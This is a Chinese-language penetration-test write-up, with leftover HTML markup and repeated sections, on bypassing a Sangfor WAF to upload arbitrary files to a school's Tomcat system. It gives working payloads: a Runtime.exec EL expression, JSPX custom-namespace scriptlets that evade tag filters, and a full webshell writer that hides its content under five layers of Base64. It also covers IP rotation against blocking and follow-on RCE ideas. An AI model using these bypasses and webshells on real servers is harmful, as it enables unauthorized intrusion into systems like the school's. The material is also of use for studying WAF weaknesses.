绕过WAF的任意文件上传技术分析<\/h1>

前言<\/h2>
本文记录了一次针对学校系统的渗透测试过程，重点分析了如何绕过深信服WAF实现任意文件上传。整个过程涉及多种绕过技术，包括后缀名绕过、JSPX命名空间绕过、网站路径获取以及多层编码写入shell等技术。<\/p>

0x01 获取网站接口<\/h2>

目标系统是一个内嵌企业微信的HTML套皮应用<\/li>
使用Burp Suite抓包获取上传接口和cookie<\/li>

发现上传点有以下特点：

文件名强制命名为"code+学号"<\/li>

后缀为最后一次点号出现之后的字母<\/li> <\/ul> <\/li> <\/ol>

0x02 后缀名绕过技术<\/h2>

常规限制<\/strong>：<\/p>

代码本身不限制后缀名<\/li>
WAF拦截jsp、jspx等常见后缀<\/li> <\/ul> <\/li>

绕过方法<\/strong>：<\/p>

尝试jspp、jspxx等变体后缀（部分绕过）<\/li>
测试发现Windows特性绕过：

常规手法（如末尾加点号、::$DATA）无效<\/li>
正斜杠(\/)可以成功绕过<\/strong>（关键点）<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol>
0x03 内容绕过技术<\/h2>

常规JSP标记检测<\/strong>：<\/p>

所有常见JSP标记都被WAF拦截<\/li> <\/ul> <\/li>

两种绕过方案<\/strong>：<\/p>
方案一：JSP EL表达式绕过<\/strong><\/p>

使用${}<\/code>标记<\/li>
示例payload：${Runtime.getRuntime().exec(request.getParameter("x"))}<\/code><\/li>
但深信服WAF过滤了这种表达式，需要变形绕过<\/li> <\/ul> 方案二：JSPX命名空间绕过（最终采用方案）<\/strong><\/p> 使用自定义命名空间替换jsp关键字<\/li> 将<jsp:scriptlet><\/code>替换为<自定义字符:scriptlet><\/code><\/li> 示例代码： <hi<\/span> xmlns:hi=<\/span>"http:\/\/java.sun.com\/JSP\/Page"<\/span>><\/span> <\/span><\/span> <hi:scriptlet><\/span> <\/span><\/span> out.println(30*30); <\/span><\/span> <\/hi:scriptlet><\/span> <\/span><\/span><\/hi><\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 0x04 获取网站路径<\/h2> Tomcat路径特性<\/strong>：<\/p> 不能使用相对路径<\/li> Tomcat默认以Tomcat\/bin作为根目录<\/li> <\/ul> <\/li> 获取路径方法<\/strong>：<\/p> \/\/ 获取当前根目录 String path = System.getProperty("user.dir"); out.println(path); \/\/ 获取web项目目录 String path = application.getRealPath("test.jsp"); out.println(path); <\/code><\/pre> 最终确定写入路径：D:\/tomcat8\/webapps\/declare\/static\/upload\/test.jsp<\/code><\/li> <\/ul> <\/li> <\/ol> 0x05 编码或加密绕过WAF写入shell<\/h2> 多层编码绕过<\/strong>：<\/p> 使用五层Base64编码绕过WAF检测<\/li> 两层Base64仍被检测到<\/li> <\/ul> <\/li> 完整payload<\/strong>：<\/p> <\/li> <\/ol> <hi<\/span> xmlns:hi=<\/span>"http:\/\/java.sun.com\/JSP\/Page"<\/span>><\/span> <\/span><\/span> <hi:directive.page<\/span> import=<\/span>"java.util.Base64,java.io.*"<\/span>\/><\/span> <\/span><\/span> <hi:scriptlet><\/span> <\/span><\/span> File file = new File("D:\/tomcat8\/webapps\/declare\/static\/upload\/test.jsp"); <\/span><\/span> FileWriter fileOut = new FileWriter(file); <\/span><\/span> Base64.Decoder base64 = Base64.getDecoder(); <\/span><\/span> byte[] str = base64.decode(base64.decode(base64.decode(base64.decode(base64.decode(request.getParameter("x").getBytes("utf-8")))))); <\/span><\/span> try { <\/span><\/span> fileOut.write(new String(str, "utf-8")); <\/span><\/span> out.println("写入成功"); <\/span><\/span> } catch (Exception e) { <\/span><\/span> e.printStackTrace(); <\/span><\/span> } finally { <\/span><\/span> try { <\/span><\/span> if (fileOut != null) { <\/span><\/span> fileOut.close(); <\/span><\/span> } <\/span><\/span> } catch (Exception e) { <\/span><\/span> e.printStackTrace(); <\/span><\/span> } <\/span><\/span> } <\/span><\/span> <\/hi:scriptlet><\/span> <\/span><\/span><\/hi><\/span> <\/span><\/span><\/code><\/pre> 替代方案建议<\/strong>：使用RSA、AES等加密算法可能更有效<\/li> 五层Base64编码虽然有效但较为笨重<\/li> <\/ul> <\/li> <\/ol> 0x06 总结与经验<\/h2> WAF绕过关键点<\/strong>：<\/p> 正斜杠(\/)后缀名绕过<\/li> JSPX命名空间自定义绕过<\/li> 多层编码（五层Base64）内容绕过<\/li> <\/ul> <\/li> 渗透测试经验<\/strong>：<\/p> 深信服WAF检测严格，会直接封禁IP<\/li> 本次测试消耗约30个IP进行fuzz<\/li> 发现的其他漏洞（如thinkphp5.0.23 RCE、泛微8.0前台SQL注入）因WAF限制未深入测试<\/li> <\/ul> <\/li> 后续建议<\/strong>：<\/p> 可尝试利用发现的log4j2和jackson依赖进行RCE<\/li> 对于严格WAF，建议准备更多IP资源进行测试<\/li> 考虑使用更高级的加密算法而非多层Base64编码<\/li> <\/ul> <\/li> <\/ol> 附录：技术要点速查表<\/h2> 技术点<\/th> 方法<\/th> 备注<\/th> <\/tr> <\/thead> 后缀名绕过<\/td> 使用正斜杠(\/)<\/td> Windows特性<\/td> <\/tr> JSP标记绕过<\/td> 自定义命名空间<\/td> 替换jsp关键字<\/td> <\/tr> 路径获取<\/td> System.getProperty()\/application.getRealPath()<\/td> Tomcat特有<\/td> <\/tr> 内容绕过<\/td> 五层Base64编码<\/td> 两层仍被检测<\/td> <\/tr> WAF特性<\/td> 直接封IP<\/td> 需准备多个IP<\/td> <\/tr> <\/tbody> <\/table>

技术点<\/th>	方法<\/th>	备注<\/th> <\/tr> <\/thead>
后缀名绕过<\/td>	使用正斜杠(\/)<\/td>	Windows特性<\/td> <\/tr>
JSP标记绕过<\/td>	自定义命名空间<\/td>	替换jsp关键字<\/td> <\/tr>
路径获取<\/td>	System.getProperty()\/application.getRealPath()<\/td>	Tomcat特有<\/td> <\/tr>
内容绕过<\/td>	五层Base64编码<\/td>	两层仍被检测<\/td> <\/tr>
WAF特性<\/td>	直接封IP<\/td>	需准备多个IP<\/td> <\/tr> <\/tbody> <\/table>

绕过WAF的任意文件上传技术分析<\/h1>

前言<\/h2> 本文记录了一次针对学校系统的渗透测试过程，重点分析了如何绕过深信服WAF实现任意文件上传。整个过程涉及多种绕过技术，包括后缀名绕过、JSPX命名空间绕过、网站路径获取以及多层编码写入shell等技术。<\/p>

前言<\/h2>
本文记录了一次针对学校系统的渗透测试过程，重点分析了如何绕过深信服WAF实现任意文件上传。整个过程涉及多种绕过技术，包括后缀名绕过、JSPX命名空间绕过、网站路径获取以及多层编码写入shell等技术。<\/p>